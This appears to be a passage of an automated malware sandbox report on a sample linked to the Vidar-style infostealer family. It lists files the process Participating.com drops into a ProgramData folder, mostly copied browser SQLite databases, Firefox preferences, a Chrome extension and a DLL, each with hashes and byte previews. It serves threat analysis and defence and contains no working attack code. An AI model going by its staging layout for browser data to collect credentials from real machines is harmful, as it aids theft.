                                                                                                                                                                                                                                                  fim3BhyKXP.gifGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    TMX.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                      file.exeGet hashmaliciousAmadey, VidarBrowse
                                                                                                                                                                                                                                                        lem.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                          ljwIPDSwFi.exeGet hashmaliciousDarkGate, MailPassView, VidarBrowse
                                                                                                                                                                                                                                                            jE4zclRJU2.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                              5CG2133F5Y_2024-04-05_12_15_35.569.zipGet hashmaliciousUnknownBrowse

                                                                                                                                                                                                                                                                Created / dropped Files

                                                                                                                                                                                                                                                                C:\ProgramData\479RQ1NOHDJM\00HDTR

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\615578\Participating.com
                                                                                                                                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):10219
                                                                                                                                                                                                                                                                Entropy (8bit):4.966520026409024
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:NPgBOOzJMk67cY82SGrPVYRjDjXK2F6KJzLLwGXtXqWgrjj31jj6OzJMk67cY82s:UYwP62I+Wr3JjkwP62I+Ws
                                                                                                                                                                                                                                                                MD5:381138FA1B1C4C298AD2441898677ED6
                                                                                                                                                                                                                                                                SHA1:B8A0B0ECAAF6F3BBD7C27DD54ACD4BC3366DD0A4
                                                                                                                                                                                                                                                                SHA-256:D4EE07BC2183E3D013B68B080B9E2F603676B27F8B0C95CCA2ED533BC671FAFA
                                                                                                                                                                                                                                                                SHA-512:095C2B1C129C36125FE17ED096FDE58AE0F8AF61527D9AEDCAB379C3221BF09D87F28846E6FA3CF9FE05C750689A2ADFCDD1AB67409780A12A425A33219858EC
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:.<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly>.. <assemblyIdentity.. buildType="release".. language="neutral".. name="Microsoft-Windows-Authentication-AuthUI-Component".. processorArchitecture="*".. publicKeyToken="".. version="0.0.0.0".. versionScope="nonSxS".. />.. <migration.. optimizePatterns="no".. offlineApply="no".. replacementSettingsVersionRange="0".. replacementVersionRange="6.2-10.0".. scope="MigWiz,Upgrade".. settingsVersion="0".. >.. <migXml xmlns="">.. <rules context="System">.. <include>.. <objectSet>.. Downlevel settings -->.. <pattern type="Registry">HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon [DefaultUserName]</pattern>.. <pattern type="Registry">HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon [DefaultDomainName]</pattern>.. <pattern type="Registry">HKLM\Software\Microsof

                                                                                                                                                                                                                                                                C:\ProgramData\479RQ1NOHDJM\16FKXL

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\615578\Participating.com
                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 32768, file counter 2, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):294912
                                                                                                                                                                                                                                                                Entropy (8bit):0.08432026317203951
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:5va0zkVmvQhyn+Zoz679fqlQbGhMHPaVAL23vD:51zkVmvQhyn+Zoz67+
                                                                                                                                                                                                                                                                MD5:C444D5B9503F9CCFA9750AB3D51848E9
                                                                                                                                                                                                                                                                SHA1:FFF755261E04C7502AF2F172DE3752D9458100FE
                                                                                                                                                                                                                                                                SHA-256:66EA7282C9A15E75F5F52CB5D745FD1B4830045EB70D99AB4F07744A67E0879E
                                                                                                                                                                                                                                                                SHA-512:E22CC4F41EC10146718E2767B68DCB20CF02AEC55DA8686988A16350045D6A31B9CDF16B7329EE436E9DBF1795699809819FEC2E7D9D460B046FAEC65BC48334
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j......z<.{...{.{a{.z.z<z.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                C:\ProgramData\479RQ1NOHDJM\16FUSJ

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\615578\Participating.com
                                                                                                                                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):1468
                                                                                                                                                                                                                                                                Entropy (8bit):5.0065780470180306
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24:p/o2e8GFp8PvMu0Vnu7vFPvJ8+FXg0Mej39ImlQu/kKcCEF4wflBX0FCUK:22e8+8PvMu0VnuRPvJ8+FXgMtImlx3cd
                                                                                                                                                                                                                                                                MD5:E68A33BDAF7AEBE6D5BBBCEFDED6AC5C
                                                                                                                                                                                                                                                                SHA1:A1120341BB4452FCA47EB5EA8FA62A08BFC48073
                                                                                                                                                                                                                                                                SHA-256:A5DC5B9F31D69E6F65F405EF4E187BAB262746AAAC08E95C195AA77A0B310DE1
                                                                                                                                                                                                                                                                SHA-512:69E1A60C0FFE8AA19B55FABE47801EEEA7CF4C84E426318D8B7BFFAF09A14FC5F569573BE30753D354B604911A616C231F485B08C3778E0A214F7E3DC9C21D2C
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:.<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly.. xmlns="urn:schemas-microsoft-com:asm.v3".. xmlns:xsd="http://www.w3.org/2001/XMLSchema".. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance".. authors="artbaker".. buildFilter="".. company="Microsoft".. copyright="".. creationTimeStamp="2005-09-13T14:05:43.4054402-07:00".. lastUpdateTimeStamp="2005-09-13T15:41:02.9208750-08:00".. manifestVersion="1.0".. owners="artbaker".. supportInformation="".. testers="".. >.. <assemblyIdentity.. buildFilter="".. buildType="release".. language="neutral".. name="Microsoft-Windows-Cryptography-CryptoConfig-DL".. processorArchitecture="*".. publicKeyToken="".. type="".. version="0.0.0.0".. versionScope="nonSxS".. />.. <migration xmlns="">.. <machineSpecific>.. <migXml>.. Check as this is only valid for down-level OS < than Windows Vista ? -->.. <detects>..

                                                                                                                                                                                                                                                                C:\ProgramData\479RQ1NOHDJM\68QI5X

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\615578\Participating.com
                                                                                                                                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):2947
                                                                                                                                                                                                                                                                Entropy (8bit):5.120077314818075
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:22e8T8PvMu0846PYPvJ8+F9gUUL0VlxfMUIgPdunPduZJ0gPdunPduZQ/+lx3cCQ:22X8PvMu0LtPvJPF+0VlVO0z60w+lfah
                                                                                                                                                                                                                                                                MD5:C7E301D9DD77A21C1CDBD73A63AF205C
                                                                                                                                                                                                                                                                SHA1:715D25AA0C06B2AD162F52A8DE06FB5040C389B1
                                                                                                                                                                                                                                                                SHA-256:239C9A49ACDA9FC9845B87819A33D07F359803153FEFFE4D2212989F82DE71E1
                                                                                                                                                                                                                                                                SHA-512:B0E6FFB10EF5EB9EB433A23803591C84F603779306E78B1648374218A50D2F77E8EE7215615E9D1BE033A96B735321FCA9D5F7B0CB65661674346FC1546E43FE
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:.<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly.. xmlns="urn:schemas-microsoft-com:asm.v3".. xmlns:xsd="http://www.w3.org/2001/XMLSchema".. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance".. authors="jeffspel".. buildFilter="".. company="Microsoft".. copyright="".. creationTimeStamp="2005-09-13T14:04:43.4054402-07:00".. lastUpdateTimeStamp="2005-09-13T15:39:02.9208750-08:00".. manifestVersion="1.0".. owners="jeffspel".. supportInformation="".. testers="".. >.. <assemblyIdentity.. buildFilter="".. buildType="release".. language="neutral".. name="Microsoft-Windows-Crypto-keys-DL".. processorArchitecture="*".. publicKeyToken="$(Build.WindowsPublicKeyToken)".. type="".. version="0.0.0.0".. versionScope="nonSxS".. />.. <migration.. xmlns="".. scope="Upgrade,MigWiz,USMT".. >.. <migXml xmlns="">.. Check as this is only valid for down-level OS < t

                                                                                                                                                                                                                                                                C:\ProgramData\479RQ1NOHDJM\6PZCBI

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\615578\Participating.com
                                                                                                                                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):8193
                                                                                                                                                                                                                                                                Entropy (8bit):5.027484893998515
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:WNPERXr2q6QOOzJMk67cY8GrPVYRjDjXK2FJpjjsjwjZjj6OzJMk67cY8GrPVYRM:a2gwP625sQ9jsw902I
                                                                                                                                                                                                                                                                MD5:2D6ACF2AEC5E5349B16581C8AE23BF3E
                                                                                                                                                                                                                                                                SHA1:0AA7B29E8F13EB16F3DFC503D4E8CC55424ECB15
                                                                                                                                                                                                                                                                SHA-256:B48F54A1F8A4C3A25D7E0FBCB95BF2C825C89ACD9C80EBACE8C15681912EDEA2
                                                                                                                                                                                                                                                                SHA-512:7943AA852F34778B9197C34E6B6978FE51E0CDD2130167CB9C7C56D1B2B1272051EFE03DF3A21A12ECB9B9303DE0733E335CDE0BBBE1A1FC429E3323D335A1FE
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:.<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly>.. AuthUI has 3 different component names that matter in its migration story... The one that applies during the migration gather phase is as follows:.. Microsoft-Windows-Authentication-AuthUI: Vista and Win7.. Microsoft-Windows-Authentication-AuthUI-Component: Win8 (and beyond).. In order to support migration from Vista/Win7 to Win8, we update the Microsoft-Windows-Authentication-AuthUI component.. to gather in the MigWiz scope (in addition to the Upgrade scope, which it already supported)... -->.. <assemblyIdentity.. buildType="$(build.buildType)".. language="neutral".. name="Microsoft-Windows-Authentication-AuthUI".. processorArchitecture="*".. publicKeyToken="".. version="0.0.0.0".. versionScope="nonSxS".. />.. <migration .. optimizePatterns="no".. offlineApply="no".. alwaysProcess="yes".. scope="MigWiz,

                                                                                                                                                                                                                                                                C:\ProgramData\479RQ1NOHDJM\6X4ECT

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\615578\Participating.com
                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):98304
                                                                                                                                                                                                                                                                Entropy (8bit):0.08235737944063153
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                                                                                                                MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                                                                                                                SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                                                                                                                SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                                                                                                                SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                C:\ProgramData\479RQ1NOHDJM\8GDTRQ

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\615578\Participating.com
                                                                                                                                                                                                                                                                File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):4814
                                                                                                                                                                                                                                                                Entropy (8bit):7.909739359753065
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:K9DcEoTtp9feekTeBInbpzQK/XMEkyS+v86l1pjb5vFQIRwDYPc:K56zAMWpQK/cyz8A7jb5vGIqQc
                                                                                                                                                                                                                                                                MD5:6E6FE97CBC259DB47CD8423141CF35A3
                                                                                                                                                                                                                                                                SHA1:EE7D38E394FC87FBF2D4CBF7A45A56E270D667E1
                                                                                                                                                                                                                                                                SHA-256:1B2BA8FC90BA68CD057B9CAAFFC218EAD59A23E37F79192ED37D0C3A7A8BAB03
                                                                                                                                                                                                                                                                SHA-512:9FEE51391A289037D36344E22A49D5D4B863F30FFD19B4377D61E57EF389599F2F2790C41B6902C45BAF27B21A1F6916B6B6DF61A490A35592BE8CD1164E1966
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:Cr24....t.........0.."0...*.H.............0.........,.*i....9M..uEW....}.n..u..._3.08.:D.e]..'J...........l..)8`....:..P}........p..w(...v...Cm@....6..8...$._v....#a(.p..o:..=.....ef.C....M+.s.0g..@.'4.$ZN..e.....T.. ...F..;Sij[...&ZTH[.].D.z. ...A..<z...Ti....&..Z&u....D......\un.....................mR...B[.r..X...;.R..*Y...j...x...3.9.h...R.L....a....V%[.W_/v.A}.VV....H..1..s.9lH.7...M..^.|.C5...#..`...dJ.."..8....w......L../.........w....v.A....0..P....JU...~.-..[....K.d..i%.7....?].......1RiP..A.... ...b ...V2............f._~....IH.c.......0.."0...*.H.............0.........]......N..h...A..LY.*..%.s.....d..h#-/.U.I9..,.<.O1.)7.l.:W2..: ...E...2..s..W..T..|3.....W*S2N}.0g...T...b.q..wp.u....Z...)..2e}.r...!.u......@A..A..g.<.+:....m..[.....4..C&...*.."..}/9y%.....*..m..,.y...1...<=."eyI.G.@.3..=.....(.-...M..8A........q......:...L`\.q..?Rn.W/.\a...g...).....Q...8....*.*.J5.Z.~....0.Lt|...d....D......=...}A3bG.Ra.oyZ..BP..,t./.0...w..WA.p.

                                                                                                                                                                                                                                                                C:\ProgramData\479RQ1NOHDJM\AASR1D

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\615578\Participating.com
                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):159744
                                                                                                                                                                                                                                                                Entropy (8bit):0.5394293526345721
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                                                                                                                                                                                                                                                MD5:52701A76A821CDDBC23FB25C3FCA4968
                                                                                                                                                                                                                                                                SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                                                                                                                                                                                                                                                SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                                                                                                                                                                                                                                                                SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                C:\ProgramData\479RQ1NOHDJM\DBAI5P

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\615578\Participating.com
                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):106496
                                                                                                                                                                                                                                                                Entropy (8bit):1.1373607036346451
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c9G/k4:MnlyfnGtxnfVuSVumEHUM4
                                                                                                                                                                                                                                                                MD5:64BCCF32ED2142E76D142DF7AAC75730
                                                                                                                                                                                                                                                                SHA1:30AB1540F7909BEE86C0542B2EBD24FB73E5D629
                                                                                                                                                                                                                                                                SHA-256:B274913369030CD83E1C76E8D486F501E349D067824C6A519F2DAB378AD0CC09
                                                                                                                                                                                                                                                                SHA-512:0C2B4FC0D38F97C8411E1541AB15B78C57FEA370F02C17F8CB26101A936F19E636B02AF1DF2A62C8EAEE6B785FE17879E2723D8618C9C3C8BD11EB943BA7AB31
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                C:\ProgramData\479RQ1NOHDJM\FUSRIE

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\615578\Participating.com
                                                                                                                                                                                                                                                                File Type:SQLite Write-Ahead Log, version 3007000
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):45352
                                                                                                                                                                                                                                                                Entropy (8bit):0.3958094375125357
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:nQwlrNmQnc/vSpKll7DYMcCSG8JO8VFDYMcSzi:QcfITll4/jVG
                                                                                                                                                                                                                                                                MD5:CB5BF3CC261B4FE5AD758C20925373CD
                                                                                                                                                                                                                                                                SHA1:9EC0DE71E0263B7C0714043097DC2AE669C2F2BE
                                                                                                                                                                                                                                                                SHA-256:CEE51CA746542EEDE94535D76234D0D5F336EBB474AC70A577304C6F0651032E
                                                                                                                                                                                                                                                                SHA-512:852A02FE2981DAA552414D028D3F9689CF13B0082BC628F146171FC40BF4416C9E5623EA36693B42401346923CDDD703B2710A1C49C280E5A55334FB5AB72680
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:7....-..............{...l..@A..............{....8..S^.SQLite format 3......@ .......................................................................... .............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                C:\ProgramData\479RQ1NOHDJM\IMY5PH

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\615578\Participating.com
                                                                                                                                                                                                                                                                File Type:SQLite Write-Ahead Log, version 3007000
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):45352
                                                                                                                                                                                                                                                                Entropy (8bit):0.3940876416121774
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:CexI5QurB/IyQTll7DYMrbxIO8VFDYMrSp:SqVdll4xjVG
                                                                                                                                                                                                                                                                MD5:B51CD8F4331276235DFA5BF1EAAF1A9E
                                                                                                                                                                                                                                                                SHA1:E8A9B579E4CDE21510D0C55B7A86417D7A72991D
                                                                                                                                                                                                                                                                SHA-256:7ECF7C676E22ABDEBAE5A0DBBFBBE5A67B98BAAE6257B328B881A0411918A3F0
                                                                                                                                                                                                                                                                SHA-512:DADEC45650D670A49AA4EC40562741DC8A602932181D03B1222AB0B59EA918FC51F1DA9DDB93976AE93C706EEA82DC6F27C218BABDC88B95758425D42984F78B
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:7....-........... .g._..<.$..7[/......... .g._..w...D.ISQLite format 3......@ .......................................................................... .............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                C:\ProgramData\479RQ1NOHDJM\MYU379

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\615578\Participating.com
                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 9, database pages 91, cookie 0x36, schema 4, UTF-8, version-valid-for 9
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):196608
                                                                                                                                                                                                                                                                Entropy (8bit):1.2650735324923974
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:384:KrJ/2qOB1nxCkMCSAELyKOMq+8QTQKC+CVumG:K0q+n0JC9ELyKOMq+8Q75
                                                                                                                                                                                                                                                                MD5:DCE8F8413E31D6E7FFCD9F1910B32275
                                                                                                                                                                                                                                                                SHA1:19CD5493E33F7159DE9BAAA24591021CDE15E965
                                                                                                                                                                                                                                                                SHA-256:FE11A9E09F87E00E92AAE60F9A4176E7D43F3A6FDE732C79772EAD5FF077594E
                                                                                                                                                                                                                                                                SHA-512:4342E1A96B4778091BE412ABE8221042C5E0FC3282A222078CA4E92102C0ED9058310D98DCBFC503A54A527BDA7EAA6C22D532F1290BE73A3C4514B6DAF4EF5F
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ .......[...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                C:\ProgramData\479RQ1NOHDJM\OPHDT2

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\615578\Participating.com
                                                                                                                                                                                                                                                                File Type:SQLite Write-Ahead Log, version 3007000
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):45352
                                                                                                                                                                                                                                                                Entropy (8bit):0.3940876416121774
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:CexI5QurB/IyQTll7DYMrbxIO8VFDYMrSp:SqVdll4xjVG
                                                                                                                                                                                                                                                                MD5:B51CD8F4331276235DFA5BF1EAAF1A9E
                                                                                                                                                                                                                                                                SHA1:E8A9B579E4CDE21510D0C55B7A86417D7A72991D
                                                                                                                                                                                                                                                                SHA-256:7ECF7C676E22ABDEBAE5A0DBBFBBE5A67B98BAAE6257B328B881A0411918A3F0
                                                                                                                                                                                                                                                                SHA-512:DADEC45650D670A49AA4EC40562741DC8A602932181D03B1222AB0B59EA918FC51F1DA9DDB93976AE93C706EEA82DC6F27C218BABDC88B95758425D42984F78B
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:7....-........... .g._..<.$..7[/......... .g._..w...D.ISQLite format 3......@ .......................................................................... .............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                C:\ProgramData\479RQ1NOHDJM\PH4O89

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\615578\Participating.com
                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1765), with CRLF line terminators
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):9976
                                                                                                                                                                                                                                                                Entropy (8bit):5.499944288613473
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:NzKneRdpYbBp6znmUzaX/6aRMKWPzDNBw8DK9mSl:Nz5eUmUtgmrwbw0
                                                                                                                                                                                                                                                                MD5:42594FD09C4DF3B174CF5D59B1CAB13A
                                                                                                                                                                                                                                                                SHA1:1B78FEB748C36A592C468A76BB60E98187D7BE4A
                                                                                                                                                                                                                                                                SHA-256:F8B55E3B04E0A59BB745C43763D8FBC1CFFDBC247B5525A489B4B74A57319393
                                                                                                                                                                                                                                                                SHA-512:E2430AB14ADF2EF1CC2CB1F96DEADAFB3598B803A5E7724FDDB68ACF015D7E052291626A3D100FED902731DBFD10A9AE3387581AD2867F64D0B27E8D51B9069F
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "38829aa4-f57e-4fd8-bfd3-d094d57ae30f");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696493966);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696493970);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

                                                                                                                                                                                                                                                                C:\ProgramData\479RQ1NOHDJM\RIMOH4

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\615578\Participating.com
                                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):24008
                                                                                                                                                                                                                                                                Entropy (8bit):6.062446965815151
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:GKODczWz9IdqYbN9h+rKipXKuS28xb3HWJvah46Flkzl2W4FWEWSawTyihVWQ4e1:6DiWzGG+mKlxb32JyczEW4FWdwGyUlI
                                                                                                                                                                                                                                                                MD5:6AEAEBF650EFC93CD3B6670A05724FE8
                                                                                                                                                                                                                                                                SHA1:A4FE07E6C678AC8D4DC095997DB5043668D103B4
                                                                                                                                                                                                                                                                SHA-256:C86891B9DF9FEEA2E98F50C9950CB446DB97A513AF0C23810F7CA818A6187329
                                                                                                                                                                                                                                                                SHA-512:5C7E8C7DBAEB22956C774199BAD83312987240D574160B846349C0E237445407FF1CAACD2984BFAD0BBBE6011CC8918AF60A0EBBE82A8561CAFA4DF825ADD183
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                Joe Sandbox View:
                                                                                                                                                                                                                                                                • Filename: lem.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                • Filename: Setup.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                • Filename: xoJxSAotVM.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                • Filename: fim3BhyKXP.gif, Detection: malicious, Browse
                                                                                                                                                                                                                                                                • Filename: TMX.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                • Filename: lem.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                • Filename: ljwIPDSwFi.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                • Filename: jE4zclRJU2.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                • Filename: 5CG2133F5Y_2024-04-05_12_15_35.569.zip, Detection: malicious, Browse
                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Q..Q..Q..E...S..E...]..Q..t..E...Z..E...P..E...S..E.S.P..E...P..RichQ..................PE..d....Q.!..........",.........$......................................................Bn....`A.........................................<..X....<..x....p..(....`..h....<...!......(....8..T............................0..............(1..0............................text...p........................... ..`.rdata..>....0......................@..@.data...`....P.......0..............@....pdata..h....`.......2..............@..@.rsrc...(....p.......4..............@..@.reloc..(............:..............@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                C:\ProgramData\479RQ1NOHDJM\TRQIE37YC

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\615578\Participating.com
                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
